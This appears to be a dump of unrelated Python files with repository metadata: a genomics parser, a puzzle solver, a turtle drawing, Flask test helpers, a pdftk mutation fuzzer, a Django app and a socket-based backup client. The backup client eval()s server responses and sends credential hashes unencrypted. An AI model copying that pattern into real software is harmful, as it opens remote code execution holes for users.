def set_fields(file=None, line=None):
    """Determine separator, name column and field map for an ensGene file.

    Two layouts are supported: ensGene.txt from UCSC (tab-separated, name in
    column 1, first column numeric) and the in-house ensGene_ref.txt
    (space-separated, name in column 0, lines starting with 'ENS...').

    Either a file path or a sample line may be given; with neither (or an
    empty file), the defaults (None, None, fields_a) are returned.
    """
    sep = name_field = None
    fields = fields_a

    # Peek at the first line of the file to detect which flavour it is.
    # (Uses a context manager so the handle is closed; the old loop-and-break
    # over open() leaked it.)
    if file:
        with open(file, 'r') as fh:
            first_line = fh.readline()
        if first_line:
            line = first_line

    if line:
        if line[:3].lower() != 'ens':
            # UCSC ensGene.txt: tab-separated, name in column 1.
            fields = fields_a
            sep = "\t"
            name_field = 1
        else:
            # In-house ensGene_ref.txt: space-separated, name in column 0.
            fields = fields_b
            sep = " "
            name_field = 0

    return sep, name_field, fields
def parse(file):
    """Parse an entire ensGene annotation file into Transcript objects."""
    txts = []
    sep, name_field, fields = set_fields(file=file)

    # Context manager fixes the leaked handle from `for line in open(file)`.
    with open(file, 'r') as fh:
        for line in fh:
            cols = line.rstrip("\n").split(sep)
            if not cols[0]:
                continue
            txt = transcript.Transcript(cols[name_field])
            for i in range(len(cols)):
                if i in fields:
                    if fields[i] == 'chrom' and cols[i][:3] != 'chr':
                        cols[i] = 'chr' + cols[i]
                    if i <= 10 or i == 16 or i == 12:
                        setattr(txt, fields[i], cols[i])
            exonStarts = cols[9].rstrip(',').split(',')
            exonEnds = cols[10].rstrip(',').split(',')
            txt.exons = []
            for e in range(len(exonStarts)):
                # start+1: seems necessary at least for mouse ensembl file
                # (shifts 0-based starts to 1-based).
                txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
            # Total exonic length, used downstream for coverage.
            for exon in txt.exons:
                txt.length += int(exon[1]) - int(exon[0]) + 1
            txts.append(txt)
    return txts
def parse_line(line):
    """Parse a single ensGene line into a Transcript, or None if unparsable."""
    sep, name_field, fields = set_fields(line=line)
    cols = line.rstrip("\n").split(sep)

    # Reject lines whose flavour was not recognised or that did not split.
    if not sep or len(cols) <= 1:
        return None

    txt = transcript.Transcript(cols[name_field])
    for idx in range(len(cols)):
        if idx not in fields:
            continue
        if fields[idx] == 'chrom' and not cols[idx].startswith('chr'):
            cols[idx] = 'chr' + cols[idx]
        if idx <= 10 or idx in (12, 16):
            setattr(txt, fields[idx], cols[idx])

    starts = cols[9].rstrip(',').split(',')
    ends = cols[10].rstrip(',').split(',')
    # Shift starts from 0-based to 1-based coordinates.
    txt.exons = []
    for pos in range(len(starts)):
        txt.exons.append([int(starts[pos]) + 1, int(ends[pos])])
    # Accumulate total exonic length, used downstream for coverage.
    for start, end in txt.exons:
        txt.length += int(end) - int(start) + 1
    return txt
def index(input, output):
    """Write a kilobase-bucket index of `input` to `output`.

    Each output line is '<chrom>:<kb> <line_num>[,<line_num>...]', mapping
    every kilobase window a transcript spans (txStart..txEnd, columns 4-5)
    to the 1-based line numbers of the transcripts overlapping it.
    """
    sep, name_field, fields = set_fields(file=input)
    indices = {}

    line_num = 1
    # Context managers fix the handles the old code never closed
    # (the output file in particular risked losing unflushed data).
    with open(input, 'r') as fh:
        for line in fh:
            cols = line.rstrip().split(sep)
            # Bucket txStart/txEnd into kilobase windows.
            start = int(int(cols[4])/1000)
            end = int(int(cols[5])/1000)
            target = cols[2]
            if not re.match('^(chr|scaffold)', target, re.IGNORECASE):
                target = 'chr' + target
            for n in range(start, end+1):
                key = ':'.join((target, str(n)))
                # setdefault replaces the deprecated dict.has_key() check.
                indices.setdefault(key, []).append(str(line_num))
            line_num += 1

    with open(output, 'w') as index_file:
        for key in sorted(indices.keys()):
            index_file.write(' '.join((key, ','.join(indices[key]))) + "\n")
def output(txts, outfile):
    """Write transcripts back out in ensGene.txt (UCSC, fields_a) layout."""
    fields = fields_a
    # One slot per column up to the highest mapped index.  (max() replaces
    # fields.keys()[-1], which depended on dict key ordering and fails
    # outright on Python 3.)
    list_size = max(fields) + 1

    # Column indices of the exon fields, which are rebuilt from txt.exons.
    field_idx = {}
    for idx, field in fields.items():
        if field in ('exonStarts', 'exonEnds', 'exonCount'):
            field_idx[field] = idx

    with open(outfile, 'w') as out:
        for i in range(len(txts)):
            txt = txts[i]
            data = ['NA'] * list_size
            for idx, field in fields.items():
                try:
                    value = getattr(txt, field)
                except AttributeError:
                    # Transcript lacks this field; leave the 'NA' placeholder.
                    continue
                else:
                    data[idx] = str(value)
            # Column 0 is the row number; exon columns come from txt.exons
            # with starts shifted back to 0-based coordinates.
            data[0] = str(i)
            data[field_idx['exonStarts']] = ','.join([str(int(e[0])-1) for e in txt.exons])
            data[field_idx['exonEnds']] = ','.join([str(e[1]) for e in txt.exons])
            data[field_idx['exonCount']] = str(len(txt.exons))
            out.write('\t'.join(data) + '\n')
if __name__ == '__main__':
    usage = "Usage: %prog annotation-file"
    parser = OptionParser(usage=usage)
    parser.add_option("-i", "--index", dest="index", help="index output file")
    (options, args) = parser.parse_args()

    # Only indexing is exposed on the command line; parse()/output() are
    # library-only entry points.
    if options.index:
        index(args[0], options.index)
UTF-8
Python
false
false
2,013
10,170,482,569,770
9fe0ecc6438502ba1baa363a7adb9dd9e18e3a08
8c8a50c1c3b01ec920184506eee31bee9165b208
/w7/logicpuzzle.py
7b3d6f589035a55eb05adf5fca560d04fa9616e0
[]
no_license
likhtal/CS212
https://github.com/likhtal/CS212
b9231337192dc3627c258da83ffe6e6a51ac5dcf
1968afd8a9757de9f19f00b12973fd0e773964af
refs/heads/master
2016-09-07T20:29:10.800748
2012-06-22T18:54:06
2012-06-22T18:54:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""
UNIT 2: Logic Puzzle
You will write code to solve the following logic puzzle:
1. The person who arrived on Wednesday bought the laptop.
2. The programmer is not Wilkes.
3. Of the programmer and the person who bought the droid,
one is Wilkes and the other is Hamming.
4. The writer is not Minsky.
5. Neither Knuth nor the person who bought the tablet is the manager.
6. Knuth arrived the day after Simon.
7. The person who arrived on Thursday is not the designer.
8. The person who arrived on Friday didn't buy the tablet.
9. The designer didn't buy the droid.
10. Knuth arrived the day after the manager.
11. Of the person who bought the laptop and Wilkes,
one arrived on Monday and the other is the writer.
12. Either the person who bought the iphone or the person who bought the tablet
arrived on Tuesday.
You will write the function logic_puzzle(), which should return a list of the
names of the people in the order in which they arrive. For example, if they
happen to arrive in alphabetical order, Hamming on Monday, Knuth on Tuesday, etc.,
then you would return:
['Hamming', 'Knuth', 'Minsky', 'Simon', 'Wilkes']
(You can assume that the days mentioned are all in the same week.)
"""
import itertools
def logic_puzzle():
    """Return the five people's names in the order they arrived (Mon-Fri).

    Brute-force search: enumerate every assignment of arrival days to
    people, to jobs, and to purchases, keeping the one that satisfies all
    twelve constraints of the puzzle (numbered in the module docstring).
    """
    days = mon, tue, wed, thu, fri = [1, 2, 3, 4, 5]
    orderings = list(itertools.permutations(days))
    # Fix: the original compared small ints with `is`/`is not`, which only
    # works by accident of CPython's small-int caching; `==`/`!=` express
    # the intended value comparison portably.
    solutions = (
        {h: "Hamming", k: "Knuth", m: "Minsky", s: "Simon", w: "Wilkes"}
        for (h, k, m, s, w) in orderings
        if k == s + 1                              # 6. Knuth arrived the day after Simon.
        for (programmer, writer, manager, designer, _) in orderings
        if programmer != w                         # 2. The programmer is not Wilkes.
        and writer != m                            # 4. The writer is not Minsky.
        and designer != thu                        # 7. Thursday arrival is not the designer.
        and k == manager + 1                       # 10. Knuth arrived the day after the manager.
        and writer != mon                          # 11 (partial): the writer is not the Monday arrival.
        for (laptop, droid, tablet, iphone, _) in orderings
        if laptop == wed                           # 1. Wednesday arrival bought the laptop.
        and tablet != fri                          # 8. Friday arrival didn't buy the tablet.
        and w != laptop                            # 11 (partial): Wilkes didn't buy the laptop.
        and {programmer, droid} == {w, h}          # 3. Programmer/droid-buyer are Wilkes and Hamming...
        and programmer != droid                    # 3. ...and they are two different people.
        and manager != k and manager != tablet     # 5. Neither Knuth nor tablet-buyer is the manager.
        and designer != droid                      # 9. The designer didn't buy the droid.
        and {w, laptop} == {mon, writer}           # 11. Laptop-buyer/Wilkes are Monday arrival and writer.
        and (iphone == tue or tablet == tue)       # 12. iPhone- or tablet-buyer arrived Tuesday.
    )
    result = next(solutions)
    return [result[day] for day in range(1, 6)]
print logic_puzzle()
UTF-8
Python
false
false
2,012
14,800,457,340,020
7bd281ab8753ced41145b2a3e7a8af86e31a70ad
9fffb8d0539a27722695ee1bf77afda2255f4120
/Python Codes/Project 04.py
6610fb275549666fc9f87c4eff1d7c1a2e9c9205
[]
no_license
mukasama/portfolio
https://github.com/mukasama/portfolio
fdde5f1b022cc3d7b5abf1c35e170ad9f5d3f401
92e1d231f76ad7473a2318da87e8b3817a9e4e5b
refs/heads/master
2016-09-07T15:41:07.331327
2014-10-19T17:53:42
2014-10-19T17:53:42
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Section 09
# 10/ 08/ 2012
# Project 04
import turtle
turtle.goto(100,0)
# Function draw_rectangle, draws a rectangle with desginated lenght and height which then fills in the color(s).
def draw_rectangle(length, height, color):
    """Draw a filled rectangle of the given length/height in the named color.

    The turtle traces two (length, height) side pairs, turning right 90
    degrees before each side, then fills the closed path.
    """
    turtle.pendown()
    turtle.color(get_color(color))
    turtle.begin_fill()
    for _ in range(2):
        turtle.right(90)
        turtle.forward(length)
        turtle.right(90)
        turtle.forward(height)
    turtle.end_fill()
    turtle.penup()
# Function draw_rectangle2 draws the outline of the rectangle with same lenght along with the desginated lenght, height and color.
def draw_rectangle2(length, height, color):
    """Draw the unfilled outline of a rectangle of the given size and color.

    Same path as draw_rectangle, but without begin_fill/end_fill, so only
    the border is drawn.
    """
    turtle.pendown()
    turtle.color(get_color(color))
    for _ in range(2):
        turtle.right(90)
        turtle.forward(length)
        turtle.right(90)
        turtle.forward(height)
    turtle.penup()
# The get_color function is used to determine red, blue and white colors from a parameter color sting.
def get_color(color):
    """Map a color name to an (r, g, b) tuple of 0/1 components.

    Known names: "red", "blue", "white", "black". Returns None for any
    other name (same as the original if/if chain falling off the end).
    """
    colors = {
        "red": (1, 0, 0),
        "blue": (0, 0, 1),
        "white": (1, 1, 1),
        "black": (0, 0, 0),
    }
    return colors.get(color)
# Draw_star function draws a star with desginated angles and lengths which then fills it with the color.
def draw_star(size, color):
    """Draw a small filled five-pointed star at the current position.

    `size` is the angle (degrees) turned left at each point tip.
    NOTE(review): the `color` argument is ignored — the fill is hard-coded
    to white via turtle.color(1, 1, 1); confirm whether that is intended.
    """
    turtle.pendown()
    turtle.begin_fill()
    turtle.color(1, 1, 1)
    # Five identical point segments: edge, left turn at the tip, edge,
    # right 144 degrees to aim at the next point.
    for _ in range(5):
        turtle.forward(2.5)
        turtle.left(size)
        turtle.forward(2.5)
        turtle.right(144)
    turtle.end_fill()
    turtle.penup()
# draw_flag draws an American-style flag whose geometry scales with `height`.
def draw_flag(height):
    # Angle passed to draw_star for the point turns (72 = 360/5).
    size = 72
    # NOTE(review): `color` is assigned but never used in this function.
    color = "white"
    # Draw 7 red stripes; after each, shift right by two stripe widths so
    # the untouched background forms the alternating stripes.
    for a in range(7):
        turtle.speed(100)
        turtle.down()
        draw_rectangle(height/13,height*1.9,"red")
        turtle.right(90)
        turtle.forward((height/13)*2)
        turtle.left(90)
    # NOTE(review): leading indentation was lost in this source dump; the
    # grouping of the statements below is a best-effort reconstruction.
    draw_rectangle(height, height*1.9, "white")
    turtle.goto(100,0)
    # Black outline around the whole flag.
    draw_rectangle2(height,324,"black")
    turtle.goto(-93.5, 0)
    # Blue canton (union) in the upper-left corner.
    draw_rectangle(height*.5385,height*.76, "blue")
    # Nine alternating rows of 6 and 5 stars; each row starts from a fixed
    # goto() position, stepping right between stars.
    turtle.goto(-218,-6)
    for c in range(6):
        draw_star(size, 'white')
        turtle.forward(22)
    turtle.goto(-209,-16)
    for d in range(5):
        draw_star(size, 'white')
        turtle.forward(23)
    turtle.goto(-218,-26)
    for e in range(6):
        draw_star(size, 'white')
        turtle.forward(22)
    turtle.goto(-209,-36)
    for f in range(5):
        draw_star(size, 'white')
        turtle.forward(23)
    turtle.goto(-218,-46)
    for g in range(6):
        draw_star(size, 'white')
        turtle.forward(22)
    turtle.goto(-209,-56)
    for h in range(5):
        draw_star(size, 'white')
        turtle.forward(23)
    turtle.goto(-218,-66)
    for i in range(6):
        draw_star(size, 'white')
        turtle.forward(22)
    turtle.goto(-209,-76)
    for j in range(5):
        draw_star(size, 'white')
        turtle.forward(23)
    turtle.goto(-218,-86)
    for k in range(6):
        draw_star(size, 'white')
        turtle.forward(22)

# Script entry: draw the flag at a 170-unit height.
draw_flag(170)
"""
Instrument class accessing metadata, mappings etc.
"""
from lib import common
from lib import schema
def get_reuters (symbol):
    """ Get an instrument using a Reuters symbol """
    # Look the symbol up in the symbol_resolve mapping table, restricted to
    # rows whose source is "reuters".
    symbol_resolve = schema.table.symbol_resolve
    # NOTE(review): `and_` (SQLAlchemy?) and `Series` (pandas?) are not in
    # this module's visible imports — confirm they are provided elsewhere,
    # otherwise this raises NameError at call time.
    args = and_(symbol_resolve.columns.symbol==symbol, symbol_resolve.columns.source=="reuters")
    matches = schema.select(symbol_resolve, args)
    if matches.rowcount == 0:
        raise Exception("Cannot map Reuters instrument %s" % symbol)
    # Wrap the third column of the first matching row — presumably the
    # resolved internal symbol; verify against the symbol_resolve schema.
    return Series(matches.fetchone()[2])
def get (symbol, create):
    """Get a symbol definition from the symbol table.

    Returns the stored row for ``symbol`` if it exists. Otherwise, when
    ``create`` is truthy, returns a fresh (unsaved) symbol row with its
    ``symbol`` field set; when falsy, raises Exception.
    """
    symbol_instance = schema.select_one("symbol", schema.table.symbol.symbol==symbol)
    if symbol_instance:
        return symbol_instance
    elif create:
        symbol_instance = schema.table.symbol()
        symbol_instance.symbol = symbol
        return symbol_instance
    else:
        # Fix: the original passed `symbol` as a *second argument* to
        # Exception instead of interpolating it into the message.
        raise Exception("Unknown symbol (%s)" % symbol)
UTF-8
Python
false
false
2,014
14,139,032,373,315
975a62f63da8ece923d0d3770343280bdbecf874
6be742824b1f4dd5f87b6afc63d823ad984c22e3
/tests/__init__.py
fec3b79eb679e0547d5d34218b0aea99ef724534
[
"AGPL-3.0-only"
]
non_permissive
BlackFlagConsortium/makershop
https://github.com/BlackFlagConsortium/makershop
d584c423aa9ad06c51ff772d5e25dbbaa21bf555
01bfb465538f28bbe20489887355af6c0bb4a5c1
refs/heads/master
2021-01-10T21:18:44.391962
2013-11-06T19:47:34
2013-11-06T19:47:34
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pprint
import unittest
from flask import json
from makershop import create_app
from makershop.models import db
from .factories import UserFactory
class MakershopTestCase(unittest.TestCase):
    """Base class for makershop API tests.

    Every test gets a debug-enabled app, a freshly rebuilt database schema
    and a test client, plus a helper for asserting JSON error responses.
    """

    def setUp(self):
        self.app = create_app()
        self.app.debug = True
        with self.app.test_request_context():
            db.drop_all()
            db.create_all()
            self.client = self.app.test_client()

    def tearDown(self):
        # Leave no tables behind for the next test.
        with self.app.test_request_context():
            db.drop_all()

    def assert_api_error(self, response, status_code, message):
        """Fail unless `response` carries `status_code` and a {'message': ...} body."""
        if response.status_code != status_code:
            raise AssertionError(
                "HTTP Status: {actual} !== {expected}".format(
                    actual=response.status_code,
                    expected=status_code,
                )
            )
        expected_body = {'message': message}
        if json.loads(response.data) != expected_body:
            raise AssertionError(
                'returned JSON:\n\nGot: {}\n\nExpected: {}'.format(
                    response.data.decode('utf-8'),
                    json.dumps(expected_body)
                )
            )
class UserLoggedIn(MakershopTestCase):
    """Test case whose client is already authenticated as a fresh user.

    Creates a factory user with password 'foo' and logs the test client in
    before each test runs.
    """

    def setUp(self):
        super().setUp()
        self.client = self.app.test_client()
        with self.app.test_request_context():
            self.user = UserFactory.create(password='foo')
        login_form = {
            'username': self.user.email,
            'password': 'foo',
        }
        self.client.post(
            '/user/login/',
            data=login_form,
        )
UTF-8
Python
false
false
2,013
4,200,478,039,695
989550166ca2d2f958d8c32743ab3da089fc5d1f
f4efd48507a830a0c1248393947ce5a74644bf28
/scripts/train_test_split.py
4771bd7788aee4613346cbe815966ea5ee66de7a
[]
no_license
pschulam-attic/ulm
https://github.com/pschulam-attic/ulm
25bfdfa947be3dfe96a005b224a4bb6862be54de
9f77ab18de2c9a5f18cc7b8daa944e58ed8c1e45
refs/heads/master
2016-09-06T17:19:47.952537
2013-05-09T17:21:39
2013-05-09T17:21:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import argparse
import random
import sys
def main():
    """Split non-blank stdin lines into train/test files by random sampling.

    A fraction ``-p`` of the lines is chosen (deterministically, seeded by
    ``--seed``) for the training file; all remaining lines go to the test
    file. Original line order is preserved within each file.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-p', help='Percentage of data for training', type=float)
    parser.add_argument('--train', help='Write the training data to this file', default='train.txt')
    parser.add_argument('--test', help='Write the test data to this file', default='test.txt')
    parser.add_argument('--seed', help='Random seed (a string)', default='split')
    args = parser.parse_args()

    data = [l.strip() for l in sys.stdin if l.strip()]

    random.seed(args.seed)
    # Fix: `xrange` tied this to Python 2; `range` yields the same sample
    # for the same seed (both are indexable sequences of the same values)
    # and works on Python 2 and 3.
    train_set = set(random.sample(range(len(data)), int(args.p * len(data))))

    with open(args.train, 'w') as train, open(args.test, 'w') as test:
        for i, d in enumerate(data):
            stream = train if i in train_set else test
            stream.write(d + '\n')

if __name__ == '__main__':
    main()
UTF-8
Python
false
false
2,013
12,292,196,416,134
f622e338359c699204218cd6a1ac9f5e330bed8c
5f3dccbac5179b500054add89744220591ce838f
/client.py
3b0bd8e2968bc86f97b664900e4a1ee3e70844fa
[]
no_license
f-prime/IonicBackup
https://github.com/f-prime/IonicBackup
23cb1e49c45799a5a5c86a4216817f5dca1f51e5
17b467bfcfe41b959c1c0ace3d3d4627531ae2f4
refs/heads/master
2021-05-27T16:28:35.642015
2013-04-05T00:40:13
2013-04-05T00:40:13
8,789,289
4
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import socket, os, time, sys, thread, getpass, hashlib
class IonicClient:
    """Python 2 sync client: mirrors the working directory with a remote
    IonicBackup server over raw sockets.

    NOTE(review): leading indentation was lost in this source dump; the
    statement grouping below is a best-effort reconstruction. Credentials
    travel as SHA-256 hex digests in clear text, and server responses are
    eval()'d — both are security liabilities worth revisiting.
    """
    def __init__(self, ip, port, username, password):
        self.ip = ip
        self.port = port
        self.username = hashlib.sha256(username).hexdigest()
        self.password = hashlib.sha256(password).hexdigest()
        # Known remote directories and {path: content-hash} of known files.
        self.dirs = []
        self.files = {}
        # Seed the hash table from everything already on disk (except the
        # client script itself).
        for x,y,z in os.walk(os.getcwd()):
            for b in z:
                if b == sys.argv[0]:
                    continue
                with open(x+"/"+b, 'rb') as file:
                    self.files[b.strip("/")] = hash(file.read())
    def main(self):
        # Sync loop: once a second, pull the server's listing and reconcile
        # it with the local working directory.
        while True:
            try:
                time.sleep(1)
                # Server replies "<dir-list-repr>:<file-list-repr>".
                stuff = self.list().split(":")
                # NOTE(review): eval() on network data can execute arbitrary
                # code — should be a safe parser (ast.literal_eval / JSON).
                try:
                    dir = eval(stuff[0])
                except SyntaxError:
                    print "\nLogin Failed"
                    break
                file = eval(stuff[1])
                # Create any directories the server has that we lack.
                for x in dir:
                    if not os.path.exists(x.strip("/")):
                        os.mkdir(x.strip("/"))
                        self.dirs.append(x)
                # Download unknown server files; a file we knew but deleted
                # locally is deleted on the server instead.
                for x in file:
                    if not os.path.exists(x) and x not in self.files:
                        self.get(x)
                        with open(x, 'rb') as f:
                            self.files[x] = hash(f.read())
                    if not os.path.exists(x) and x in self.files:
                        self.delete(x)
                        del self.files[x]
                # Walk the local tree and push anything new or changed.
                for x,y,z in os.walk(os.getcwd()):
                    for d in y:
                        direc = x.strip(os.getcwd())+"/"+d
                        direc = direc.strip("/")
                        if direc not in self.dirs:
                            self.dirs.append(direc)
                        if direc not in dir:
                            self.senddir(direc)
                    for f in z:
                        file_c = x +"/"+ f
                        file_c = file_c.replace(os.getcwd(), '').strip("/")
                        if file_c == sys.argv[0]:
                            continue
                        if file_c in self.files and file_c not in file:
                            self.send(file_c)
                        elif file_c not in self.files and file_c not in file:
                            with open(file_c, 'rb') as f:
                                self.files[file_c] = hash(f.read())
                            self.send(file_c)
                        elif file_c in self.files and file_c in file:
                            # Re-send only when the content hash changed.
                            with open(file_c, 'rb') as f:
                                if hash(f.read()) != self.files[file_c]:
                                    self.send(file_c)
                                    with open(file_c, 'rb') as f:
                                        self.files[file_c] = hash(f.read())
            except Exception, error:
                print error
                print "\n Could not connect to server, trying again."
                time.sleep(1)
    def senddir(self, direc):
        # Tell the server to create directory `direc`.
        senddir = socket.socket()
        try:
            senddir.connect((self.ip, self.port))
        except:
            print "Could not connect to server."
        send = "senddir {0} {1} {2}".format(direc, self.username, self.password)
        senddir.send(send)
        senddir.close()
    def list(self):
        # Fetch the server's "dirs:files" listing as a raw string.
        # NOTE(review): `list` shadows the builtin inside this method.
        list = socket.socket()
        try:
            list.connect((self.ip, self.port))
        except:
            print "Could not connect to server."
        send = "list {0} {1}".format(self.username, self.password)
        list.send(send)
        data = ''
        while True:
            d = list.recv(1024)
            data = data + d
            if not d:
                break
        return data
        # NOTE(review): unreachable — the return above exits first, so the
        # socket is never closed here.
        list.close()
    def send(self, file):
        # Upload one file; header line is terminated by a blank CRLF pair.
        print "sending", file
        send = socket.socket()
        send.connect((self.ip, self.port))
        sends = "send {0} {1} {2}\r\n\r\n".format(file, self.username, self.password)
        send.send(sends)
        with open(file, 'rb') as file_:
            for x in file_.readlines():
                send.send(x)
    print "Done sending", file
        send.close()
    def get(self, file):
        # Download one file from the server, streaming 1 KiB at a time.
        print "Downloading", file
        get = socket.socket()
        try:
            get.connect((self.ip, self.port))
        except:
            print "Could not connect to server"
        send = "get {0} {1} {2}".format(file, self.username, self.password)
        get.send(send)
        with open(file, 'wb') as name:
            while True:
                data = get.recv(1024)
                if not data:
                    print "Done downloading", file
                    get.close()
                    break
                name.write(data)
    def delete(self, file):
        # Remove a file locally and ask the server to do the same; the
        # client script itself is protected from deletion.
        if file == sys.argv[0]:
            print "You can not delete Ionic Backup Client"
        else:
            try:
                os.remove(file)
            except:
                print "File doesn't exist"
            delete = socket.socket()
            try:
                delete.connect((self.ip, self.port))
            except:
                print "Could not connect to server."
            send = "del {0} {1} {2}".format(file, self.username, self.password)
            delete.send(send)
            delete.close()
    def delete_dir(self, file):
        # Remove a directory locally and on the server.
        try:
            os.rmdir(file)
        except:
            print "Directory doesn't exist"
        deldir = socket.socket()
        try:
            deldir.connect((self.ip, self.port))
        except:
            print "Could not connect to server."
        send = "deldir {0} {1} {2}".format(file, self.username, self.password)
        deldir.send(send)
        deldir.close()
def shell(ip, port, username, password):
    """Interactive maintenance shell run alongside the sync loop.

    Supports `help`, `rm <file>`, `rmdir <dir>` and `ls`; each command
    opens a fresh IonicClient connection.
    """
    while True:
        cmd = raw_input("IonicShell> ")
        if cmd == "help":
            print """
rm <file> - Deletes a file on the server and locally.
rmdir <dir> - Deletes a directory on the server and locally.
ls - Returns all the files on the server.
"""
        elif cmd.startswith("rm "):
            cmd = cmd.split()[1]
            IonicClient(ip, port, username, password).delete(cmd)
        elif cmd.startswith("rmdir "):
            cmd = cmd.split()[1]
            IonicClient(ip, port, username, password).delete_dir(cmd)
        elif cmd == "ls":
            # NOTE(review): eval() on server data — same risk as in main().
            stuff = IonicClient(ip, port, username, password).list().split(":")
            print "Directories: \n"+'\n'.join(eval(stuff[0]))
            print "\n"
            print "Files: \n"+'\n'.join(eval(stuff[1]))
if __name__ == "__main__":
    try:
        ip = sys.argv[1]
        port = int(sys.argv[2])
    except IndexError:
        print "Usage: python client.py <ip> <port>"
    else:
        username = raw_input("Username: ")
        password = getpass.getpass("Password: ")
        # The interactive shell runs on a background thread; the sync loop
        # owns the main thread.
        thread.start_new_thread(shell, (ip, port, username, password))
        IonicClient(ip, port, username, password).main()
UTF-8
Python
false
false
2,013
18,528,488,934,689
7a6929f42659f7250da041793911e80342ef94a9
975e70f89e54e91adc00f1028183011f6a9a37fd
/Software Debugging/fuzzing.py
5bae71e90f61335351740d89f3d47776f1bd18e9
[]
no_license
marceldallagnol/short-programs
https://github.com/marceldallagnol/short-programs
953ca21a71a0a1ada6c85e05ad416c8049983a28
9a5fd1f1f92d4789e43c81b8953cb9770a08e1b5
refs/heads/master
2021-05-27T23:03:32.965876
2012-09-15T23:42:28
2012-09-15T23:42:28
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from subprocess import call
from datetime import datetime
from random import randrange
from shutil import copy
# Single-byte mutation fuzzer for pdftk: each iteration flips one random
# byte of front_base.pdf, runs pdftk on the result, and archives the input.
for i in range(100000):
    test = list(open('front_base.pdf','rb').read())
    # Replace one byte at a random offset with a random character.
    test[randrange(len(test))] = '%c' % randrange(256)
    test = ''.join(test)
    front = open('front.pdf', 'w')
    front.write(test)
    front.close()
    call('pdftk front.pdf background back.pdf output out.pdf'.split())
    # Keep every mutated input, numbered and timestamped, for later triage.
    copy('front.pdf', str(i) + '_' + str(datetime.now()))
    print i
from __future__ import absolute_import
import logging
from django.core.handlers.wsgi import WSGIHandler as DjangoWSGIApp
from django.conf import settings
from gevent.wsgi import WSGIServer
import gevent
from .app import DirtApp
class DjangoApp(DirtApp):
    """DirtApp that serves a Django WSGI application with gevent's WSGIServer."""
    log = logging.getLogger(__name__)
    def setup(self):
        self.application = DjangoWSGIApp()
        if self.settings.DEBUG:
            # Wrap with werkzeug's interactive in-browser debugger in DEBUG
            # (evalex enables code evaluation in tracebacks).
            from werkzeug import DebuggedApplication
            self.application = DebuggedApplication(self.application, evalex=True)
        # Expose the dirt API factory through Django's settings module so
        # Django-side code can reach it.
        settings.get_api = self.settings.get_api
        self.server = WSGIServer(self.settings.http_bind, self.application, log=None)
    def serve_dirt_rpc(self):
        """ Calls ``DirtApp.serve`` to start the RPC server, which lets callers
        use the debug API. """
        if getattr(self.settings, "bind_url", None) is None:
            self.log.info("no `bind_url` specified; RPC server not starting.")
            return
        DirtApp.serve(self)
    def serve(self):
        # The RPC server runs on a greenlet; the HTTP server blocks here.
        self.api_thread = gevent.spawn(self.serve_dirt_rpc)
        self.log.info("Starting server on http://%s:%s...", *self.settings.http_bind)
        self.server.serve_forever()
    def get_api(self, *args, **kwargs):
        """ The DjangoApp returns an empty API object by default so that tab
        completion of the API will work. Feel free to override this method.
        """
        return object()
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import os
import sys
import unittest
import fundamental_tester_base
from pyplusplus import code_creators
from pyplusplus.module_builder import call_policies
from pyplusplus import function_transformers as ft
# C++ snippet templates emitted into the generated Boost.Python module:
# implicit std::auto_ptr conversion between two wrapped classes...
impl_conv_code = \
"""
boost::python::implicitly_convertible< std::auto_ptr< %(from)s >, std::auto_ptr< %(to)s > >();
"""
# ...and smart-pointer registration for a single held type.
register_sptr = \
"""
boost::python::register_ptr_to_python< %s >();
"""
class tester_t(fundamental_tester_base.fundamental_tester_base_t):
    """Py++ code-generation test: transferring object ownership to C++."""
    # Name of the generated extension module under test.
    EXTENSION_NAME = 'transfer_ownership_old'
    def __init__( self, *args ):
        fundamental_tester_base.fundamental_tester_base_t.__init__(
            self
            , tester_t.EXTENSION_NAME
            , *args )
    def customize( self, mb ):
        # Expose the event classes through wrapper classes held by auto_ptr
        # so ownership can be transferred from Python to C++.
        event_clss = mb.classes( lambda cls: cls.name in ( 'event_t', 'do_nothing_t' ) )
        for cls in event_clss:
            cls.exposed_class_type = cls.EXPOSED_CLASS_TYPE.WRAPPER
            cls.held_type = 'std::auto_ptr< %s >' % cls.wrapper_alias
            cls.add_registration_code( register_sptr % 'std::auto_ptr< %s >' % cls.decl_string, False )
            cls.add_registration_code( impl_conv_code % { 'from' : cls.wrapper_alias
                                                          , 'to' : cls.decl_string }
                                       , False)
            for base in cls.recursive_bases:
                if base.access_type == 'public':
                    cls.add_registration_code( # from class to its base
                        impl_conv_code % { 'from' : cls.decl_string
                                           , 'to' : base.related_class.decl_string }
                        , False)
                    cls.add_registration_code( # from wrapper to class base class
                        impl_conv_code % { 'from' : cls.wrapper_alias
                                           , 'to' : base.related_class.decl_string }
                        , False)
        simulator = mb.class_( 'simulator_t' )
        # get_event returns a reference owned by the simulator.
        simulator.mem_fun( 'get_event' ).call_policies \
            = call_policies.return_internal_reference()
        # schedule() takes ownership of its first argument.
        schedule = mb.mem_fun( 'schedule' )
        schedule.add_transformation( ft.transfer_ownership(0), alias='schedule' )
    def run_tests( self, module):
        # Python subclass of the wrapped C++ event_t; records notify() calls
        # into `container` so the C++ callback can be observed.
        class py_event_t( module.event_t ):
            def __init__( self, container ):
                module.event_t.__init__( self )
                self.container = container
            def notify( self ):
                print 'notify'
                self.container.append( 1 )
                print '1 was append'
        print 'test started'
        notify_data = []
        simulator = module.simulator_t()
        print 'simulator created'
        event = py_event_t( notify_data )
        print 'py_event_t created: ', id( event )
        # Ownership of `event` transfers to the C++ simulator here.
        simulator.schedule( event )
        print 'event was shceduled'
        print 'event refcount: ', sys.getrefcount( event )
        print 'simulator refcount: ', sys.getrefcount( simulator )
        #~ del event
        print 'event was deleted'
        event = simulator.get_event()
        print 'event was restored via saved reference in simulator: ', id( event )
        print 'event refcount: ', sys.getrefcount( simulator.get_event() )
        print 'call event.notify(): ', simulator.get_event().notify()
        print 'call simulator.run()'
        simulator.run()
        # run() must have invoked the Python-side notify() exactly once.
